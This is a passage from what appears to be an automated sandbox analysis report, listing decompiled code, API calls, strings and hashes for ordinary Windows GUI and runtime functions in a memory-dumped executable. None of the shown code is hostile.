                                                                            • Opcode Fuzzy Hash: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72
                                                                            • Instruction Fuzzy Hash: 38513E7590021D9BCB22DB59C891AD9B3BCAF0C304F4045FAE908F7641D638AF858F65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 004584CC: GetActiveWindow.USER32 ref: 004584F3
                                                                              • Part of subcall function 004584CC: GetLastActivePopup.USER32(?), ref: 00458505
                                                                            • GetWindowRect.USER32 ref: 004571A2
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004571DA
                                                                            • MessageBoxA.USER32 ref: 00457219
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045728F,?,00000000,00457288), ref: 00457269
                                                                            • SetActiveWindow.USER32(00000000,0045728F,?,00000000,00457288), ref: 0045727A
                                                                            Strings
                                                                            • cF , xrefs: 0045718E
                                                                            • ( , xrefs: 0045717F
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Active$LastMessagePopupRect
                                                                            • String ID: cF$(
                                                                            • API String ID: 3456420849-2654615770
                                                                            • Opcode ID: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838
                                                                            • Instruction ID: e3fa6410cbb3c08fe700889c1ec58b143b8f2f9b644a860e070ba4dfd1801142
                                                                            • Opcode Fuzzy Hash: 8ffb3ed4ba807d08fbadb44ba06598bdbe1bc9adf50b3b3d853d5f2a8d08e838
                                                                            • Instruction Fuzzy Hash: E1511875E04108AFDB44DBA9DD81FAEB7B9FB48301F1445AAF900EB392D678AD048B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 71%
                                                                                                                                  E0042048C(void* __eax, void* __ebx, void* __edi, void* __esi) { 				char _v5; 				intOrPtr* _v12; 				long _v16; 				char _v20; 				char _v24; 				long _t22; 				char _t29; 				void* _t53; 				intOrPtr _t61; 				intOrPtr* _t62; 				intOrPtr _t63; 				intOrPtr _t66; 				intOrPtr _t67; 				void* _t72; 				void* _t73; 				intOrPtr _t74;  				_t72 = _t73; 				_t74 = _t73 + 0xffffffec; 				_push(__esi); 				_push(__edi); 				_t53 = __eax; 				_t22 = GetCurrentThreadId(); 				_t62 =  *0x462f38; // 0x463034 				if(_t22 !=  *_t62) { 					_v24 = GetCurrentThreadId(); 					_v20 = 0; 					_t61 =  *0x462da0; // 0x416108 					E0040C214(_t53, _t61, 1, __edi, __esi, 0,  &_v24); 					E00404184(); 				} 				if(_t53 <= 0) { 					E00420464(); 				} else { 					E00420470(_t53); 				} 				_v16 = 0; 				EnterCriticalSection(0x4662e8); 				_push(_t72); 				_push(0x420651); 				_push( *[fs:eax]); 				 *[fs:eax] = _t74; 				_v16 = InterlockedExchange( &E00461BEC, _v16); 				_push(_t72); 				_push(0x420632); 				_push( *[fs:eax]); 				 *[fs:eax] = _t74; 				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) { 					_t29 = 0; 				} else { 					_t29 = 1; 				} 				_v5 = _t29; 				if(_v5 == 0) { 					L15: 					_pop(_t63); 					 *[fs:eax] = _t63; 					_push(E00420639); 					return E00403928(_v16); 				} else { 					if( *((intOrPtr*)(_v16 + 8)) > 0) { 						_v12 = E0041A80C(_v16, 0); 						E0041A6F8(_v16, 0); 						LeaveCriticalSection(0x4662e8); 						 *[fs:eax] = _t74; 						 *[fs:eax] = _t74; 						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4205d5, _t72); 						_pop(_t66); 						 *[fs:eax] = _t66; 						_t67 = 0x420596; 						 *[fs:eax] = _t67; 						_push(E004205DC); 						EnterCriticalSection(0x4662e8); 						return 0; 					} else { 						goto L15; 					} 				} 			}                        


                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00420497
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004204A6
                                                                              • Part of subcall function 00420464: ResetEvent.KERNEL32(00000270,004204E1,?,?,00000000), ref: 0042046A
                                                                            • EnterCriticalSection.KERNEL32(004662E8,?,?,00000000), ref: 004204EB
                                                                            • InterlockedExchange.KERNEL32(00461BEC,?), ref: 00420507
                                                                            • LeaveCriticalSection.KERNEL32(004662E8,00000000,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 00420560
                                                                            • EnterCriticalSection.KERNEL32(004662E8,004205DC,00420632,?,00000000,00420651,?,004662E8,?,?,00000000), ref: 004205CF
                                                                            Strings
                                                                            • 40F , xrefs: 0042049C
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                            • String ID: 40F
                                                                            • API String ID: 2189153385-2631550472
                                                                            • Opcode ID: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction ID: ef1ed86c35f2a73ab8eb88fda658a997fa2195ff33e20d550fe0e6f0303cdae6
                                                                            • Opcode Fuzzy Hash: f3b73c3653be0ae3d7b3340ece53e80e737d93ba8f3197faa0f4dbda62d736b7
                                                                            • Instruction Fuzzy Hash: DC31D330B04714BFD701EF65E851A6ABBE8EB49704FA184BBF400E2692D77C9850CE2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
E004493D8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
    intOrPtr _v8;
    void* __ecx;
    intOrPtr _t9;
    void* _t11;
    intOrPtr _t17;
    void* _t28;
    intOrPtr _t33;
    intOrPtr _t34;
    intOrPtr _t37;
    struct HINSTANCE__* _t41;
    void* _t43;
    intOrPtr _t45;
    intOrPtr _t46;

    _t45 = _t46;
    _push(__ebx);
    _t43 = __edx;
    _t28 = __eax;
    if( *0x466574 == 0) {
        *0x466574 = E0040C9AC("comctl32.dll", __eax);
        if( *0x466574 >= 0x60000) {
            _t41 = GetModuleHandleA("comctl32.dll");
            if(_t41 != 0) {
                *0x466578 = GetProcAddress(_t41, "ImageList_WriteEx");
            }
        }
    }
    _v8 = E00421180(_t43, 1, 0);
    _push(_t45);
    _push(0x4494d2);
    _push( *[fs:eax]);
    *[fs:eax] = _t46;
    if( *0x466578 == 0) {
        _t9 = _v8;
        if(_t9 != 0) {
            _t9 = _t9 - 0xffffffec;
        }
        _push(_t9);
        _t11 = E00448314(_t28);
        _push(_t11);
        L004234D8();
        if(_t11 == 0) {
            _t33 =  *0x462c60; // 0x423548
            E0040C1D8(_t33, 1);
            E00404184();
        }
    } else {
        _t17 = _v8;
        if(_t17 != 0) {
            _t17 = _t17 - 0xffffffec;
        }
        _push(_t17);
        _push(1);
        _push(E00448314(_t28));
        if( *0x466578() != 0) {
            _t34 =  *0x462c60; // 0x423548
            E0040C1D8(_t34, 1);
            E00404184();
        }
    }
    _pop(_t37);
    *[fs:eax] = _t37;
    _push(0x4494d9);
    return E00403928(_v8);
}


                                                                            APIs
                                                                              • Part of subcall function 0040C9AC: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,0040CA82), ref: 0040C9EE
                                                                              • Part of subcall function 0040C9AC: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA23
                                                                              • Part of subcall function 0040C9AC: VerQueryValueA.VERSION(?,0040CA94,?,?,00000000,?,00000000,?,00000000,0040CA65,?,00000000,?,00000000,0040CA82), ref: 0040CA3D
                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 0044940C
                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 0044941D
                                                                            • ImageList_Write.COMCTL32(00000000,?,00000000,004494D2), ref: 0044949C
                                                                            Strings
                                                                            • comctl32.dll , xrefs: 004493EC
                                                                            • H5B , xrefs: 00449470, 004494A5
                                                                            • ImageList_WriteEx , xrefs: 00449417
                                                                            • comctl32.dll , xrefs: 00449407
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                            • String ID: H5B$ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                            • API String ID: 4063495462-2067531044
                                                                            • Opcode ID: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788
                                                                            • Instruction ID: 7feeba355522faf04f3a0e2cb1e42fc148b7a82705179c7db10de74883139383
                                                                            • Opcode Fuzzy Hash: 1bd18ea55a635c8a3144036754e74cc9919261c25993034c422739c8a92a9788
                                                                            • Instruction Fuzzy Hash: 6A21A470704200BBF700EF7AED86A2B37A9AB84758B11013EF801D7391EA7D9D01E65D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
E00423010(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
    void _v20;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t24;
    int _t25;
    struct HMONITOR__* _t28;
    struct tagMONITORINFO* _t30;
    intOrPtr* _t32;

    _t30 = _a8;
    _t28 = _a4;
    if( *0x46633c != 0) {
        _t25 = 0;
        if(_t28 == 0x12340042 && _t30 != 0 && _t30->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
            _t30->rcMonitor.left = 0;
            _t30->rcMonitor.top = 0;
            _t30->rcMonitor.right = GetSystemMetrics(0);
            _t30->rcMonitor.bottom = GetSystemMetrics(1);
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _t32 = _t30;
            *(_t32 + 0x24) = 1;
            if( *_t32 >= 0x48) {
                lstrcpyA(_t32 + 0x28, "DISPLAY");
            }
            _t25 = 1;
        }
    } else {
        *0x466320 = E00422CE4(4, _t24,  *0x466320, _t28, _t30);
        _t25 = GetMonitorInfoA(_t28, _t30);
    }
    return _t25;
}


                                                                            APIs
                                                                            • GetMonitorInfoA.USER32(?,?), ref: 00423041
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423068
                                                                            • GetSystemMetrics.USER32 ref: 0042307D
                                                                            • GetSystemMetrics.USER32 ref: 00423088
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 004230B2
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • DISPLAY , xrefs: 004230A9
                                                                            • GetMonitorInfo , xrefs: 00423028
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfo
                                                                            • API String ID: 1539801207-1633989206
                                                                            • Opcode ID: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1
                                                                            • Instruction ID: 1d13c1e411ecf5a9961b19d848809dc4e278015fb6addf28eb62cabff9c87d63
                                                                            • Opcode Fuzzy Hash: a3a10cab4bb061dffc4b299bcad7828da0626630f6a6faf7876a81cdf98517a1
                                                                            • Instruction Fuzzy Hash: 4F11DC71B003249ED720DF25AC407A7B7F9FB05711F40492AED4597394E7B8AA488BBA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 56%
E004230E4(intOrPtr _a4, intOrPtr* _a8) {
    void _v20;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t24;
    int _t25;
    intOrPtr _t27;
    intOrPtr _t28;
    intOrPtr* _t30;
    intOrPtr* _t32;

    _t30 = _a8;
    _t28 = _a4;
    if( *0x46633d != 0) {
        _t25 = 0;
        if(_t28 == 0x12340042 && _t30 != 0 &&  *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
            *((intOrPtr*)(_t30 + 4)) = 0;
            *((intOrPtr*)(_t30 + 8)) = 0;
            *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0);
            *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1);
            asm("movsd");
            asm("movsd");
            asm("movsd");
            asm("movsd");
            _t32 = _t30;
            *(_t32 + 0x24) = 1;
            if( *_t32 >= 0x48) {
                lstrcpyA(_t32 + 0x28, "DISPLAY");
            }
            _t25 = 1;
        }
    } else {
        _t27 =  *0x466324; // 0x4230e4
        *0x466324 = E00422CE4(5, _t24, _t27, _t28, _t30);
        _t25 =  *0x466324(_t28, _t30);
    }
    return _t25;
}


                                                                            APIs
                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042313C
                                                                            • GetSystemMetrics.USER32 ref: 00423151
                                                                            • GetSystemMetrics.USER32 ref: 0042315C
                                                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 00423186
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • GetMonitorInfoA , xrefs: 004230FC
                                                                            • 0B , xrefs: 00423101, 0042310E, 00423115
                                                                            • DISPLAY , xrefs: 0042317D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                            • String ID: DISPLAY$GetMonitorInfoA$0B
                                                                            • API String ID: 2545840971-2122693701
                                                                            • Opcode ID: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5
                                                                            • Instruction ID: 8329856f4a0663fa361ed590d044dbc65a5c11abf511ac1c4802788fd1076b43
                                                                            • Opcode Fuzzy Hash: 6412428992578bdd4025669aefdb9b4bb941a51ac52645d491b848b38ed5ebc5
                                                                            • Instruction Fuzzy Hash: CE11CD71700320AFE7208F64AC447A7B7F8EB09311F40452FED5597281E7B8A950CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
E004045BC(void* __ecx) {
    long _v4;
    int _t3;

    if( *0x46304c == 0) {
        if( *0x46102c == 0) {
            _t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
        }
        return _t3;
    } else {
        if( *0x463220 == 0xd7b2 &&  *0x463228 > 0) {
            *0x463238();
        }
        WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
        return WriteFile(GetStdHandle(0xfffffff5), E00404644, "true",  &_v4, 0);
    }
}


                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56,?,0044C980), ref: 004045F5
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683,?,?,?,00000001,0040472E,00402E0F,00402E56), ref: 004045FB
                                                                            • GetStdHandle.KERNEL32(000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404610
                                                                            • WriteFile.KERNEL32(00000000,000000F5,00404644,?,00460C02,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,00460C02,00000000,?,00404683), ref: 00404616
                                                                            • MessageBoxA.USER32 ref: 00404634
                                                                            Strings
                                                                            • Runtime error at 00000000 , xrefs: 004045EE, 0040462D
                                                                            • Error , xrefs: 00404628
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction ID: 95cfc67e252f177aabf72d71697ea3d849ed0d739da66028a04d1f7d325712f5
                                                                            • Opcode Fuzzy Hash: 486cc6febccf89cf48693867195bad861259d6e457c75e9bf5e0aeb01c8351a7
                                                                            • Instruction Fuzzy Hash: 2CF062A06803C475EA10B7655D46F9622484785F1AF2446BFF310F40F2BAFC89C49B2F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 55%
E00448638(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
    intOrPtr _v8;
    struct HDC__* _v12;
    char _v28;
    char _v44;
    void* __edi;
    void* __ebp;
    void* _t46;
    void* _t57;
    int _t85;
    void* _t119;
    void* _t120;
    void* _t129;
    struct HDC__* _t138;
    struct HDC__* _t139;
    int _t140;
    void* _t141;

    _t121 = __ecx;
    _t137 = __ecx;
    _v8 = __edx;
    _t120 = __eax;
    _t46 = E004481D8(__eax);
    if(_t46 != 0) {
        _t144 = _a4;
        if(_a4 == 0) {
            __eflags =  *(_t120 + 0x54);
            if( *(_t120 + 0x54) == 0) {
                _t140 = E00428F64(1);
                *(_t120 + 0x54) = _t140;
                E0042A27C(_t140, 1);
                *((intOrPtr*)( *_t140 + 0x40))();
                _t121 =  *_t140;
                *((intOrPtr*)( *_t140 + 0x34))();
            }
            E00426188( *((intOrPtr*)(E00429538( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
            E004193B4(0,  *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
            _push( &_v44);
            _t57 = E00429538( *(_t120 + 0x54));
            _pop(_t129);
            E0042652C(_t57, _t129, _t137);
            _push(0);
            _push(0);
            _push(0xffffffff);
            _push(0);
            _push(0);
            _push(0);
            _push(0);
            _push(E0042681C(E00429538( *(_t120 + 0x54))));
            _push(_v8);
            _push(E00448314(_t120));
            L00423490();
            E004193B4(_a16, _a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
            _v12 = E0042681C(E00429538( *(_t120 + 0x54)));
            E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000014, _t137, _t141, __eflags);
            _t138 = E0042681C(_t137);
            SetTextColor(_t138, 0xffffff);
            SetBkColor(_t138, 0);
            _t85 = _a16 + 1;
            __eflags = _t85;
            BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
            E00426188( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0xff000010, _t137, _t141, _t85);
            _t139 = E0042681C(_t137);
            SetTextColor(_t139, 0xffffff);
            SetBkColor(_t139, 0);
            return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
        }
        _push(_a8);
        _push(E00448028(_t144));
        E00448610(_t120, _t144);
        _push(E00448028(_t144));
        _push(0);
        _push(0);
        _push(_a12);
        _push(_a16);
        _push(E0042681C(__ecx));
        _push(_v8);
        _t119 = E00448314(_t120);
        _push(_t119);
        L00423490();
        return _t119;
    }
    return _t46;
}

                                                                            APIs
                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00448697
                                                                            • ImageList_DrawEx.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00448738
                                                                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00448785
                                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0044878D
                                                                            • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 004487B2
                                                                              • Part of subcall function 00448610: ImageList_GetBkColor.COMCTL32(00000000,?,00448671,00000000,?), ref: 00448626
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ColorImageList_$Draw$Text
                                                                            • String ID:
                                                                            • API String ID: 2027629008-0
                                                                            • Opcode ID: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7
                                                                            • Instruction ID: c7ff4466aff230b0ce27f37bc18780dc13651bfdc4d4199a20c36a001531123d
                                                                            • Opcode Fuzzy Hash: 4094665da36111d1273b04d8056914dd580bcbf9be6dc5764fec73b4cc8f8cb7
                                                                            • Instruction Fuzzy Hash: F2512D71700114ABDB50FF69DD82F9E37E8AF48704F50005AFA04EB286CA78EC519B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
E00453544(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
    intOrPtr* _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr _v20;
    short _v22;
    intOrPtr _v28;
    struct HWND__* _v32;
    char _v36;
    intOrPtr _t55;
    intOrPtr _t61;
    intOrPtr _t67;
    intOrPtr _t68;
    intOrPtr _t71;
    intOrPtr _t72;
    intOrPtr _t74;
    intOrPtr _t76;
    intOrPtr _t86;
    intOrPtr _t88;
    intOrPtr _t91;
    void* _t96;
    intOrPtr _t105;
    intOrPtr _t133;
    void* _t135;
    void* _t138;
    void* _t139;
    intOrPtr _t140;

    _t136 = __esi;
    _t135 = __edi;
    _t116 = __ebx;
    _t138 = _t139;
    _t140 = _t139 + 0xffffffe0;
    _push(__ebx);
    _push(__esi);
    _v36 = 0;
    _v8 = __eax;
    _push(_t138);
    _push(0x453836);
    _push(*[fs:eax]);
    *[fs:eax] = _t140;
    E00438F48();
    if(*((char*)(_v8 + 0x57)) != 0 || *((intOrPtr*)(*_v8 + 0x50))() == 0 || (*(_v8 + 0x358) & 0x00000008) != 0 || *((char*)(_v8 + 0x277)) == 1) {
        _t55 = *0x462cd4; // 0x423580
        E00406740(_t55, &_v36);
        E0040C11C(_v36, 1);
        E00404184();
    }
    if(GetCapture() != 0) {
        SendMessageA(GetCapture(), 0x1f, 0, 0);
    }
    ReleaseCapture();
    _t61 = *0x466580; // 0x26df470
    E00455C64(_t61);
    _push(_t138);
    _push(0x453819);
    _push(*[fs:edx]);
    *[fs:edx] = _t140;
    *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000008;
    if(*((char*)(_v8 + 0x330)) == 0) {
        _t105 = *0x466580; // 0x26df470
        if(*((char*)(_t105 + 0xd4)) != 0) {
            E0043F0FC(_v8);
            E004423D4(_v8);
        }
    }
    _v32 = GetActiveWindow();
    _v20 = E0044C924();
    _t67 = *0x466584; // 0x26e66a0
    _t68 = *0x466584; // 0x26e66a0
    E0041A888(*((intOrPtr*)(_t68 + 0x7c)), *((intOrPtr*)(_t67 + 0x78)), 0);
    _t71 = *0x466584; // 0x26e66a0
    *((intOrPtr*)(_t71 + 0x78)) = _v8;
    _t72 = *0x466584; // 0x26e66a0
    _v22 = *(_t72 + 0x44) & 0x0000ffff;
    _t74 = *0x466584; // 0x26e66a0
    E00454B28(_t74, 0);
    _t76 = *0x466584; // 0x26e66a0
    _v28 = *((intOrPtr*)(_t76 + 0x48));
    _v16 = E0044CA08(0, _t116, _t135, _t136);
    _push(_t138);
    _push(0x4537f7);
    _push(*[fs:edx]);
    *[fs:edx] = _t140;
    E00453454(_v8);
    _push(_t138);
    _push(0x453756);
    _push(*[fs:edx]);
    *[fs:edx] = _t140;
    SendMessageA(E004423F8(_v8), 0xb000, 0, 0);
    *((intOrPtr*)(_v8 + 0x294)) = 0;
    do {
        _t86 = *0x466580; // 0x26df470
        E00456DA0(_t86, _t135, _t136);
        _t88 = *0x466580; // 0x26df470
        if(*((char*)(_t88 + 0xa4)) == 0) {
            if(*((intOrPtr*)(_v8 + 0x294)) != 0) {
                E004533B4(_v8);
            }
        } else {
            *((intOrPtr*)(_v8 + 0x294)) = 2;
        }
        _t91 = *((intOrPtr*)(_v8 + 0x294));
    } while (_t91 == 0);
    _v12 = _t91;
    SendMessageA(E004423F8(_v8), 0xb001, 0, 0);
    _t96 = E004423F8(_v8);
    if(_t96 != GetActiveWindow()) {
        _v32 = 0;
    }
    _pop(_t133);
    *[fs:eax] = _t133;
    _push(0x45375d);
    return E0045344C();
}

                                                                            APIs
                                                                            • GetCapture.USER32 ref: 004535B5
                                                                            • GetCapture.USER32 ref: 004535C4
                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004535CA
                                                                            • ReleaseCapture.USER32(00000000,00453836), ref: 004535CF
                                                                            • GetActiveWindow.USER32 ref: 00453620
                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004536B6
                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453723
                                                                            • GetActiveWindow.USER32 ref: 00453732
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                            • String ID:
                                                                            • API String ID: 862346643-0
                                                                            • Opcode ID: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce
                                                                            • Instruction ID: c71c2c127747cc088a0eefe62a95ea86982853baf425fc74ebc282f5ae4e7b0f
                                                                            • Opcode Fuzzy Hash: 9e28f5377d61abf311c9daef1181d16d300c76bc30cf22954581ec0863c717ce
                                                                            • Instruction Fuzzy Hash: AA519F70A00244AFDB11EF65C986B5D77F1EF49345F1544BAF804AB3A2EB78AE44CB08
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E00440210(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
    intOrPtr _v8;
    struct HDC__* _v12;
    int _v16;
    struct tagRECT _v32;
    signed int _t68;
    intOrPtr _t74;
    intOrPtr _t81;
    int _t102;
    void* _t104;
    void* _t105;
    intOrPtr _t119;
    int _t125;
    void* _t126;
    void* _t129;

    _v12 = __edx;
    _v8 = __eax;
    *(_v8 + 0x54) = *(_v8 + 0x54) | 0x00000080;
    _v16 = SaveDC(_v12);
    _push(_t129);
    _push(0x440388);
    _push(*[fs:edx]);
    *[fs:edx] = _t129 + 0xffffffe4;
    E00439028(_v12, _a4, __ecx);
    IntersectClipRect(_v12, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c));
    _t102 = 0;
    _t125 = 0;
